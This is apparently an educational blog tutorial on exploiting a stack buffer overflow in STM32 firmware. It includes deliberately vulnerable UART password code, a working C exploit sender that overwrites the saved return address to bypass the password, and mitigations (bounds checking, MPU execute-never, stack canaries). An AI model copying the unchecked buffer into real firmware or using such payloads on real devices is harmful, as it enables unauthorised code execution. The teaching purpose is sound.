Stack Buffer Overflow in STM32

26 September 2018
Embedded, AppSec

Nucleo64 STM32F446RE

Modern microcontrollers resemble computers from 10–20 years ago not only in computing power but also in their vulnerabilities.

Below we talk about an almost forgotten class of vulnerabilities that is no longer purely academic and is enjoying a new wave of popularity.


0x00 Buffer overflow

As a test dummy, we take the following code, which waits for the user's password and decides whether to grant access.

Smash this for fun and profit
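#include "main.h"   // CubeMX-generated: HAL, LD2_GPIO_Port, LD2_Pin
#include <stdint.h>
#include <stdio.h>
#include <string.h>

// Provided by the CubeMX-generated part of main.c
extern UART_HandleTypeDef huart2;
void SystemClock_Config(void);
static void MX_GPIO_Init(void);
static void MX_USART2_UART_Init(void);

static const char sWelcome[] = "Access granted\r\n"; // hypothetical text
static const char sPassword[] = "pass123";
static int DeviceLocked = 1;

void callme(void) {
	HAL_UART_Transmit(&huart2, (uint8_t *)sWelcome, strlen(sWelcome), 100);

	while (1) { // just keep the LED blinking
		HAL_GPIO_TogglePin(LD2_GPIO_Port, LD2_Pin);
		HAL_Delay(100);
	}
}

void CheckUART(void) {
	uint8_t byte;
	int offset = 0;
	char buffer[20] = { 0 };

	while (1) {
		if (HAL_UART_Receive(&huart2, &byte, 1, 0) == HAL_OK) {
			if (byte == '\r' || byte == '\n') {
				buffer[offset] = 0; // null-terminated string
				if (strcmp(sPassword, buffer) == 0) {
					DeviceLocked = 0;
				}
				offset = 0;
				return;
			} else {
				// Intentionally vulnerable: offset is never checked against sizeof(buffer)
				buffer[offset] = byte;
				offset++;
			}
		}
	}
}

int main(void) {
	HAL_Init();
	SystemClock_Config();
	MX_GPIO_Init();
	MX_USART2_UART_Init();

	char buffer[40] = { 0 }; // room for the 31-character message plus NUL
	// Print callme()'s address so you don't need to reverse the firmware for now
	snprintf(buffer, sizeof(buffer), "callme() pointer: 0x%08lx \r\n",
			(unsigned long)(uintptr_t)callme);
	HAL_UART_Transmit(&huart2, (uint8_t *)buffer, strlen(buffer), 100);

	while (1) {
		CheckUART();
		if (!DeviceLocked) {
			callme();
		}
		HAL_Delay(100);
	}
}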

In main(), right after initialization, the firmware prints the address of callme(), the function we want to call.

The vulnerability is in CheckUART(), which reads the password. The end of input is detected by \r or \n (the Enter key).

The main problem is that nothing stops the incoming bytes from exceeding the size of buffer: offset is never compared with its 20-byte length. Where do those extra bytes get written?

0x01 Memory Map

Reference Manual STM32F446

The SRAM of the STM32 starts at address 0x2000 0000. Its lower part holds global and static variables, and the rest is shared by the heap and the stack.

Stack goes down
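To get a feel for the addresses that appear later in this article, here is a small host-side C sketch that classifies an address on the STM32F446RE. The region boundaries reflect our reading of the STM32F446 memory map and should be checked against the reference manual: 512 KB of flash at 0x0800 0000, and 128 KB of SRAM at 0x2000 0000 split into 112 KB SRAM1 and 16 KB SRAM2. classify() and the macro names are hypothetical. In a typical CubeMX linker script the initial stack pointer is set to the end of SRAM (0x2002 0000), and the stack grows down from there.

```c
#include <assert.h>
#include <stdint.h>

/* Assumed STM32F446RE layout: 512 KB flash, 128 KB SRAM (SRAM1 + SRAM2). */
#define FLASH_START 0x08000000u
#define FLASH_END   0x08080000u /* exclusive */
#define SRAM1_START 0x20000000u
#define SRAM2_START 0x2001C000u
#define SRAM_END    0x20020000u /* exclusive; typical initial sp */

static_assert(SRAM2_START - SRAM1_START == 112u * 1024u, "SRAM1 is 112 KB");
static_assert(SRAM_END - SRAM2_START == 16u * 1024u, "SRAM2 is 16 KB");

typedef enum { REGION_FLASH, REGION_SRAM, REGION_OTHER } region_t;

/* Bit 0 is cleared first: Thumb code addresses such as 0x08001435 have it set. */
static region_t classify(uint32_t addr)
{
    addr &= ~1u;
    if (addr >= FLASH_START && addr < FLASH_END)
        return REGION_FLASH;
    if (addr >= SRAM1_START && addr < SRAM_END)
        return REGION_SRAM;
    return REGION_OTHER;
}
```

For example, classify(0x08001435u) reports flash, because callme() is code stored in flash. The buffer[] of CheckUART() lives on the stack, just below the top of SRAM.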

The stack is not only a software concept. Inside the MCU core there is a dedicated register, the stack pointer (sp), which holds the address of the top of the stack, i.e. of the current stack frame.

ARM Registers

When a function is called, the following is stored on the stack:

  • the return address, i.e. where the function was called from. The call instruction puts it in the link register (lr), and a function that calls other functions saves lr on the stack;
  • the contents of the general-purpose registers the function is going to modify;
  • space for local variables.

To allocate space for all of the above (that is, to create a new stack frame), sp is decremented by the required number of bytes, because the stack grows downward, from higher addresses to lower ones. At the end of the function, sp is incremented by the same amount and the saved values are restored to the registers.

The saved lr value is then loaded into pc (the program counter), the register that holds the address of the next instruction to execute. In other words, by overwriting the copy of lr stored on the stack, we can redirect execution wherever we like when the function returns.

0x02 Assembler

Let's see how this works in CheckUART; its disassembly is shown below. Ways to obtain such a listing were covered in our previous article on reverse engineering STM32 firmware.

Assembly listing for CheckUART

Here is the mechanism described above (the function body has been cut out of the image):

Stack frame allocation and destruction

ARM has single instructions that save a list of registers to the stack and load them back: push and pop, respectively.

  • Allocating the stack frame: sub sp, 0x18.
  • Freeing the space: add sp, 0x18.
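To make the mechanism concrete, here is a host-side C simulation of a frame like CheckUART's. It does not run on the board. Only sub sp, 0x18 and add sp, 0x18 come from the listing. The saved register list {r4, r5, r6, lr} and the position of buffer at sp+4 are assumptions. They were chosen so that the distance from buffer[0] to the saved lr comes out to 32 bytes, the figure found experimentally in the next section.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define RAM_SIZE   256u  /* simulated SRAM; the stack starts at the top */
#define LOCALS     0x18u /* sub sp, 0x18 */
#define BUF_OFFSET 4u    /* hypothetical: buffer[20] sits at sp+4 */

typedef struct {
    uint8_t  ram[RAM_SIZE]; /* little-endian, like the STM32 */
    uint32_t sp;            /* index into ram; the stack grows downward */
    uint32_t r[4];          /* r4, r5, r6, lr */
} cpu_t;

static void store32(uint8_t *p, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        p[i] = (uint8_t)(v >> (8 * i));
}

static uint32_t load32(const uint8_t *p)
{
    uint32_t v = 0;
    for (int i = 3; i >= 0; i--)
        v = (v << 8) | p[i];
    return v;
}

/* push {r4, r5, r6, lr}; sub sp, 0x18. Returns the index of buffer[0]. */
static uint32_t prologue(cpu_t *c)
{
    assert(c->sp >= 16u + LOCALS);
    c->sp -= 16u;
    for (uint32_t i = 0; i < 4; i++) /* lowest register at the lowest address */
        store32(&c->ram[c->sp + 4u * i], c->r[i]);
    c->sp -= LOCALS;
    return c->sp + BUF_OFFSET;
}

/* Like CheckUART(): copy input byte by byte with no check against 20. */
static void write_input(cpu_t *c, uint32_t buf, const uint8_t *in, size_t n)
{
    assert(buf + n <= RAM_SIZE); /* only keeps the simulation in bounds */
    for (size_t i = 0; i < n; i++)
        c->ram[buf + i] = in[i];
}

/* add sp, 0x18; pop {r4, r5, r6, pc}. Returns the new pc (the saved lr). */
static uint32_t epilogue(cpu_t *c)
{
    c->sp += LOCALS;
    for (uint32_t i = 0; i < 3; i++)
        c->r[i] = load32(&c->ram[c->sp + 4u * i]);
    uint32_t pc = load32(&c->ram[c->sp + 12u]);
    c->sp += 16u;
    return pc;
}
```

A normal call returns to the saved lr. If write_input() is given 32 filler bytes followed by a 4-byte address, epilogue() instead loads that address into pc, and the filler also ends up in r4–r6.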

0x03 Exploit

As the target we use a Nucleo-64 board with the STM32F446RE MCU. USART2 is routed through the on-board debug probe, which exposes it as a virtual serial port: COMx on Windows or /dev/tty.* on Unix-like systems. The chip waits for the password pass123, then greets the user and starts happily blinking the LED.

Having the function pointer will simplify the task :)

We do not know the password, but we have just learned how the return address saved on the stack can be overwritten. So we send more than 20 bytes into the buffer. We found experimentally that for this code, compiled with -Os, it takes 32 bytes of filler followed by 4 more bytes: the address we want the program to jump to. Let's make it execute callme() (0x08001435). The address is odd because bit 0 of a Thumb code address is set. It has to be sent least significant byte first because the STM32 is little-endian. This is easy to script in Python with the serial (pyserial) and struct modules. The exploit source is shown below:

The delay between byte writes is necessary for reliable transmission
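The original exploit is a Python script that survives only as a screenshot. Here is a rough POSIX C equivalent for illustration; it is not the original script. It assumes the input is terminated with '\r' so that CheckUART() returns, and that USART2 runs at 115200 baud. The pause between bytes is left to the caller. build_payload(), open_serial() and send_slowly() are hypothetical helpers.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <fcntl.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <termios.h>
#include <time.h>
#include <unistd.h>

#define FILLER_LEN  32u                    /* found experimentally for -Os */
#define PAYLOAD_LEN (FILLER_LEN + 4u + 1u) /* filler + address + '\r' */

/* 32 filler bytes, the target address least significant byte first,
 * then '\r' so that CheckUART() returns. Returns 0 if an address byte
 * is '\r' or '\n', which would end the input early. */
static size_t build_payload(uint8_t out[PAYLOAD_LEN], uint32_t target)
{
    for (unsigned i = 0; i < 4; i++) {
        uint8_t b = (uint8_t)(target >> (8 * i));
        if (b == '\r' || b == '\n')
            return 0;
    }
    memset(out, '.', FILLER_LEN);
    for (unsigned i = 0; i < 4; i++)
        out[FILLER_LEN + i] = (uint8_t)(target >> (8 * i));
    out[FILLER_LEN + 4] = '\r';
    return PAYLOAD_LEN;
}

/* Raw 8N1; 115200 baud is an assumption, match MX_USART2_UART_Init(). */
static int open_serial(const char *path)
{
    int fd = open(path, O_RDWR | O_NOCTTY);
    if (fd < 0)
        return -1;
    struct termios tio;
    if (tcgetattr(fd, &tio) != 0) {
        close(fd);
        return -1;
    }
    tio.c_iflag = 0;
    tio.c_oflag = 0;
    tio.c_lflag = 0;
    tio.c_cflag = CS8 | CREAD | CLOCAL;
    tio.c_cc[VMIN] = 1;
    tio.c_cc[VTIME] = 0;
    if (cfsetispeed(&tio, B115200) != 0 || cfsetospeed(&tio, B115200) != 0 ||
        tcsetattr(fd, TCSANOW, &tio) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Write one byte at a time with a pause after each byte. */
static int send_slowly(int fd, const uint8_t *buf, size_t len, long pause_ns)
{
    assert(pause_ns >= 0 && pause_ns < 1000000000L); /* nanosleep() limit */
    struct timespec gap = { 0, pause_ns };
    for (size_t i = 0; i < len; i++) {
        if (write(fd, &buf[i], 1) != 1)
            return -1;
        nanosleep(&gap, NULL);
    }
    return 0;
}
```

Usage sketch: call build_payload(p, 0x08001435u), open the port with open_serial(), and pass the payload to send_slowly() with an arbitrary pause such as 10 ms (10000000 ns). The device path, e.g. /dev/ttyACM0, is hypothetical. On Windows a COMx port needs a different API. Note that 0x08001435 contains neither 0x0A nor 0x0D, so CheckUART() reads all four address bytes.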

Run the script, press reset on the board, and a second later the LED is blinking, no password required:

izi gg wp

At the same time, in the real world

0x04 What have I done

what have i done
¯\_(ツ)_/¯

Firmware constantly has to buffer and assemble incoming data: most interfaces transmit raw bytes, while the application layer works with aggregated packets. A mistake in an array bounds check can turn into Remote Code Execution (RCE) or Arbitrary Code Execution, which defeats every other effort to protect the device and its data.

By filling the buffer not with garbage (like 32 × “.”) but with machine instructions, and then redirecting execution to them, an attacker can run their own code (shellcode).
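The fix for this particular bug is a bounds check before every write into the buffer. Below is a minimal sketch, assuming a byte-at-a-time reader like CheckUART(). line_reader_t and line_feed() are hypothetical names, and the logic is plain C so it can be tested on a PC.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

typedef enum { LINE_MORE, LINE_DONE, LINE_TOO_LONG } line_status_t;

typedef struct {
    char   buf[20];    /* same size as in CheckUART() */
    size_t len;        /* number of stored characters */
    bool   overflowed; /* input exceeded the buffer; reject this line */
} line_reader_t;

/* Feed one received byte. Bytes beyond sizeof(buf) - 1 are dropped
 * instead of being written past the end of the array. */
static line_status_t line_feed(line_reader_t *r, uint8_t byte)
{
    assert(r->len < sizeof r->buf); /* invariant: room for the NUL */
    if (byte == '\r' || byte == '\n') {
        line_status_t st = r->overflowed ? LINE_TOO_LONG : LINE_DONE;
        r->buf[r->len] = '\0';
        r->len = 0; /* ready for the next line */
        r->overflowed = false;
        return st;
    }
    if (r->len < sizeof r->buf - 1)
        r->buf[r->len++] = (char)byte;
    else
        r->overflowed = true;
    return LINE_MORE;
}
```

In the firmware, CheckUART() would pass every byte from HAL_UART_Receive() to line_feed() and compare the password only on LINE_DONE. An over-long line is rejected rather than truncated, and no byte ever lands outside buf.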

0x05 Empire Strikes Back

The main protection mechanisms are:

  • ASLR (Address Space Layout Randomization): the addresses of functions and of the stack differ every time the code runs. It requires a full-fledged OS and an MMU. It is widely used on desktop and server systems, but is not available on most routers and other embedded devices running GNU/Linux.
  • Stack Canary: most modern toolchains have flags that make the compiler place a special value on the stack and check it on function exit. If the value has been overwritten, execution goes to a dedicated failure handler instead of returning. In GCC the flag is -fstack-protector. Obviously, a static value that never changes is easy to spot, and it can simply be included in the payload so that the check does not fire.
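  • XN (eXecute Never): marks memory regions from which instructions must never be executed. On Cortex-M it is configured through the MPU (Memory Protection Unit). XN only stops shellcode placed in RAM. Jumping to code that already exists in flash, as our callme() exploit does, still works. For the STM32F446, marking SRAM as non-executable can look like this: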
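void MPU_Init(void) { // call early in main(), e.g. right after HAL_Init()
	MPU_Region_InitTypeDef MPU_InitStruct = { 0 }; // no uninitialized fields

	HAL_MPU_Disable();

	// Region 0: SRAM from 0x20000000, readable and writable but never executable
	MPU_InitStruct.Enable = MPU_REGION_ENABLE;
	MPU_InitStruct.Number = MPU_REGION_NUMBER0;
	MPU_InitStruct.BaseAddress = 0x20000000;
	MPU_InitStruct.Size = MPU_REGION_SIZE_8MB; // base must be aligned to the size
	MPU_InitStruct.SubRegionDisable = 0x00;
	MPU_InitStruct.TypeExtField = MPU_TEX_LEVEL0;
	MPU_InitStruct.AccessPermission = MPU_REGION_FULL_ACCESS;
	MPU_InitStruct.DisableExec = MPU_INSTRUCTION_ACCESS_DISABLE; // the XN bit
	MPU_InitStruct.IsShareable = MPU_ACCESS_SHAREABLE;
	MPU_InitStruct.IsCacheable = MPU_ACCESS_CACHEABLE;
	MPU_InitStruct.IsBufferable = MPU_ACCESS_NOT_BUFFERABLE;
	HAL_MPU_ConfigRegion(&MPU_InitStruct);

	// Privileged code keeps the default memory map outside region 0
	HAL_MPU_Enable(MPU_PRIVILEGED_DEFAULT);
}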
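The canary idea can be shown with another host-side C simulation, which also shows why a fixed value is weak. The layout here (buffer, then canary, then saved lr) is a simplified assumption. As far as we know, on bare-metal ARM GCC reads the reference value from a global named __stack_chk_guard and calls __stack_chk_fail() when the check fails. The canary is therefore only as secret as that variable. frame_enter(), frame_leave() and unchecked_write() are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BUF_LEN    20u
#define CANARY_OFF BUF_LEN        /* canary right above the buffer */
#define LR_OFF     (BUF_LEN + 4u) /* saved lr right above the canary */
#define FRAME_LEN  (BUF_LEN + 8u)

typedef enum { RET_OK, RET_SMASHED } ret_status_t;

static void put32(uint8_t *p, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        p[i] = (uint8_t)(v >> (8 * i));
}

static uint32_t get32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Prologue: save lr and place the guard value between it and the buffer. */
static void frame_enter(uint8_t frame[FRAME_LEN], uint32_t guard, uint32_t lr)
{
    put32(&frame[CANARY_OFF], guard);
    put32(&frame[LR_OFF], lr);
}

/* Epilogue: return through the saved lr only if the canary is intact.
 * Otherwise report the smash; a real protector calls __stack_chk_fail(). */
static ret_status_t frame_leave(const uint8_t frame[FRAME_LEN], uint32_t guard,
                                uint32_t *pc)
{
    if (get32(&frame[CANARY_OFF]) != guard)
        return RET_SMASHED;
    *pc = get32(&frame[LR_OFF]);
    return RET_OK;
}

/* Unchecked copy into the buffer, like CheckUART(). */
static void unchecked_write(uint8_t frame[FRAME_LEN], const uint8_t *in, size_t n)
{
    assert(n <= FRAME_LEN); /* keeps the simulation itself in bounds */
    memcpy(frame, in, n);
}
```

Overwriting the canary with filler makes frame_leave() refuse to return. If the payload carries the known static guard value at CANARY_OFF, the check passes and the injected address is used. Loading a per-device random value into the guard at boot, before protected functions run, is the usual way to close that gap.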

0x06 DIY

Try writing your own shellcode, placing it in the buffer, and executing it. Then repeat the experiment with the MPU enabled.

0x07 Moar?


We write about this kind of thing on the TechMaker Facebook page and teach it in our Courses.